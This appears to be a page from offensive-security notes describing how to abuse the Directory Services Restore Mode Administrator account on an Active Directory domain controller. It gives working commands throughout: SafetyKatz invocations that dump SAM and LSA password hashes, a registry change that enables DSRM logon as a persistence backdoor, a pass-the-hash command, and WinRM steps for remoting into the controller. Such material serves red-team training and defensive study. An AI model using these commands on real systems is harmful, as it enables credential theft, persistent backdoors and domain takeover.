DSRM

Every Domain Controller (DC) contains a built-in local Administrator account used for Directory Services Restore Mode (DSRM). This account is created during DC promotion and protected with a password (SafeModePassword) that is often never rotated post-deployment — making it a valuable and persistent credential target.

Although this Administrator account is local to the DC and not part of AD, if the DC is misconfigured, the DSRM account can be abused for Pass-the-Hash (PtH) attacks. With Domain Admin (DA) privileges, its NTLM hash can be extracted using tools like SafetyKatz:

# Extract the DSRM password hash (requires DA privileges)
SafetyKatz.exe "token::elevate" "lsadump::sam" "exit"

To confirm it belongs to the DSRM account and not the DA, compare it with the output of:

# Extract the DA password hash
SafetyKatz.exe "lsadump::lsa /patch" "exit"

By default, the DSRM Administrator cannot log in while the system is running in normal (non-DSRM) mode. To enable login using the DSRM account, the registry key on the DC must be modified:

# Allow DSRM account login in normal mode
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "DsrmAdminLogonBehavior" /t REG_DWORD /d 2 /f

Once enabled, a PtH attack can be perform using the DSRM account’s hash — note that the domain must be set to the DC's hostname, not the AD domain (as it would be for an Overpass-the-Hash attack):

# PtH with DSRM credentials
SafetyKatz.exe "sekurlsa::pth /domain:dcorp-dc /user:administrator /ntlm:<ntlm> /run:powershell.exe" "exit"

To access the DC via WinRM (e.g., using PowerShell remoting), ensure the host is trusted and reachable:

# Add the DC as a trusted host (required to access it with RC4 via WinRM)
Set-Item WSMan:\localhost\Client\TrustedHosts 172.16.2.1

# Access the DC via WinRM using the NT hash
Enter-PSSession -cn 172.16.2.1 -Authentication NegotiateWithImplicitCredential

This technique allows lateral movement directly into the Domain Controller using a long-lived, often-overlooked local account. While powerful, it depends on misconfiguration and the attacker having DA rights for hash extraction and registry changes.

PreviousDiamond TicketNextGolden Ticket

Last updated

Was this helpful?